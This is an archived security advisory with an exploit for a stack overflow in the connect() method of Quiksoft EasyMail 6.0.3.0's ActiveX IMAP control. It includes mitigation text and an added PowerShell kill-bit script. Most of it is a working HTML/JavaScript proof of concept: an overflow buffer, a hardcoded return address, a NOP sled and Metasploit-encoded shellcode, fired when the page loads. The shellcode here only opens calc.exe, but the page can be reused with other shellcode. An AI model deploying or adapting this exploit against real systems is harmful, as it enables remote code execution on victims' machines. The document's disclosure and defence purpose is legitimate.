
Quiksoft EasyMail 6.0.3.0 IMAP connect() Stack Overflow

Posted Sep 18, 2009
Authored by Sebastian Wolfgarten | Site devtarget.org

Quiksoft EasyMail version 6.0.3.0 suffers from an IMAP related connect() stack overflow vulnerability.

tags | exploit, overflow, imap
SHA-256 | 66991cdd84a9ccc131edc267756ec5e66748a1a775a9804a3050875dd458e065

<!--

I - TITLE

Security advisory: Quiksoft EasyMail 6.0.3.0 imap connect() ActiveX stack overflow exploit

II - SUMMARY

Description: A remotely exploitable buffer overflow in the ActiveX component
of Quiksoft EasyMail 6.0.3.0 allows arbitrary code execution in the user
context.

Author: Sebastian Wolfgarten (sebastian at wolfgarten dot com), http://www.devtarget.org

Date: September 17th, 2009

Severity: Medium (remote code execution in the user context)

References: http://www.devtarget.org/easymail-advisory-09-2009.txt

III - OVERVIEW

Quote from quiksoft.com: "The EasyMail Products are relied upon by over
thousands of international corporations, federal, state and local
organizations, and individual developers. Quiksoft has established the
EasyMail products as "the professional, reliable, and easy to use choice for
e-mail development". More information about the product can be found online
at http://www.quiksoft.com.

IV - DETAILS

Quiksoft EasyMail 6.0.3.0 ships emimap4.dll, an ActiveX component that
facilitates the development of IMAP4-aware applications. The connect()
function of this component is prone to a classic buffer overflow when a
particularly long argument is passed and the application attempts to copy
that data into a fixed-size buffer. This allows for the execution of
arbitrary code in the user context.

V - MITIGATING MEASURES

Either set the killbit for the relevant ActiveX component
(clsid:0CEA3FB1-7F88-4803-AA8E-AD021566955D) or install the latest version
of Quiksoft EasyMail, which is not considered vulnerable.
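
The killbit mitigation above, as an added example that is not part of the original advisory. It assumes the standard Internet Explorer "ActiveX Compatibility" registry location and the 0x400 kill-bit flag, and must be run from an elevated PowerShell prompt; the function name Set-KillBit is hypothetical.

```powershell
# Added example: set the Internet Explorer kill bit for the EasyMail IMAP4 control.
$Clsid   = '{0CEA3FB1-7F88-4803-AA8E-AD021566955D}'   # CLSID given in the advisory
$KillBit = 0x00000400                                  # kill-bit value of "Compatibility Flags"
$Name    = 'Compatibility Flags'

# 32-bit IE on 64-bit Windows reads the WOW6432Node view, so cover both views.
$Roots = @(
    'HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility',
    'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility'
) | Where-Object { Test-Path (Split-Path $_ -Parent) }   # skip a view that does not exist

function Set-KillBit {
    param([string]$Root, [string]$Clsid, [int]$Flag)

    $key = Join-Path $Root $Clsid
    if (-not (Test-Path $key)) {
        # Creates the CLSID key (and the parent key if it is missing).
        New-Item -Path $key -Force | Out-Null
    }

    # Keep any compatibility flags that are already set; only OR in the kill bit.
    $current = 0
    $prop = Get-ItemProperty -Path $key -Name $Name -ErrorAction SilentlyContinue
    if ($null -ne $prop) { $current = [int]$prop.$Name }

    $new = $current -bor $Flag
    Set-ItemProperty -Path $key -Name $Name -Value $new -Type DWord

    # Read the value back so the result reflects what is actually stored.
    $stored = [int](Get-ItemProperty -Path $key -Name $Name).$Name
    [pscustomobject]@{
        Key     = $key
        Before  = '0x{0:X8}' -f $current
        After   = '0x{0:X8}' -f $stored
        Blocked = (($stored -band $Flag) -eq $Flag)
    }
}

$Roots | ForEach-Object { Set-KillBit -Root $_ -Clsid $Clsid -Flag $KillBit } |
    Format-Table -AutoSize
```

Every row should report Blocked as True; Internet Explorer then refuses to instantiate the control regardless of the page that references it.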

VI - NOTES

Code below was taken from an exploit originally written by e.b
(see http://www.milw0rm.com/exploits/4825). Thanks also to Francis Provencher
for drawing my attention to Quiksoft EasyMail. Shellcode below is rather
harmless and executes calc.exe.

Tested on Windows XP SP2 English, IE6, emimap4.dll version 6.0.3.0

-->

<html>
<head>
<title>Quiksoft EasyMail 6.0.3.0 imap connect() stack overflow</title>
<script language="JavaScript" defer>
function Check() {

var buf = 'A';
while (buf.length <= 440) buf = buf + 'A';


// win32_exec - EXITFUNC=seh CMD=c:\windows\system32\calc.exe Size=378 Encoder=Alpha2 http://metasploit.com
var shellcode1 =
unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%49%49%49%49%49%49" +

"%48%49%49%49%49%49%49%49%49%49%49%49%51%5a%6a%43" +

"%58%30%42%31%50%42%41%6b%42%41%53%42%32%42%41%32" +

"%41%41%30%41%41%58%50%38%42%42%75%48%69%6b%4c%4d" +

"%38%63%74%75%50%33%30%67%70%4c%4b%73%75%57%4c%6e" +

"%6b%63%4c%45%55%63%48%33%31%58%6f%6c%4b%70%4f%77" +

"%68%6e%6b%73%6f%71%30%65%51%6a%4b%72%69%4e%6b%36" +

"%54%4e%6b%45%51%4a%4e%46%51%6b%70%4f%69%4c%6c%6e" +

"%64%59%50%73%44%53%37%58%41%7a%6a%54%4d%33%31%78" +

"%42%48%6b%7a%54%77%4b%52%74%66%44%34%44%62%55%59" +

"%75%6e%6b%41%4f%36%44%45%51%6a%4b%53%56%4c%4b%46" +

"%6c%72%6b%4c%4b%53%6f%37%6c%63%31%6a%4b%4e%6b%75" +

"%4c%6c%4b%54%41%48%6b%4d%59%51%4c%51%34%34%44%4a" +

"%63%30%31%6f%30%62%44%4e%6b%71%50%54%70%4b%35%6b" +

"%70%50%78%46%6c%6c%4b%63%70%44%4c%4c%4b%44%30%35" +

"%4c%6e%4d%6c%4b%61%78%55%58%6a%4b%64%49%4e%6b%6b" +

"%30%6c%70%57%70%57%70%47%70%4c%4b%70%68%47%4c%71" +

"%4f%44%71%6b%46%33%50%66%36%4f%79%4c%38%6e%63%4f" +

"%30%71%6b%30%50%41%78%58%70%6c%4a%53%34%51%4f%33" +

"%58%4e%78%39%6e%6d%5a%46%6e%61%47%4b%4f%69%77%63" +

"%53%45%6a%33%6c%72%57%30%69%50%6e%62%44%70%6f%73" +

"%47%41%63%41%4c%50%73%42%59%31%63%50%74%65%35%70" +

"%6d%54%73%65%62%33%6c%30%63%41%71%70%6c%53%53%66" +
"%4e%31%75%74%38%70%65%77%70%43");

var eip = unescape("%0F%DD%17%7D"); // Windows XP SP2 English

var nop = unescape("%90%90%90%90%90%90%90%90%90%90%90%90");

var m = buf + eip + nop + shellcode1 + nop;

obj.connect(m);
}

</script>
</head>
<body onload="JavaScript: return Check();">
<object id="obj" classid="clsid:0CEA3FB1-7F88-4803-AA8E-AD021566955D">
Failed to instantiate object.
</object>
</body>
</html>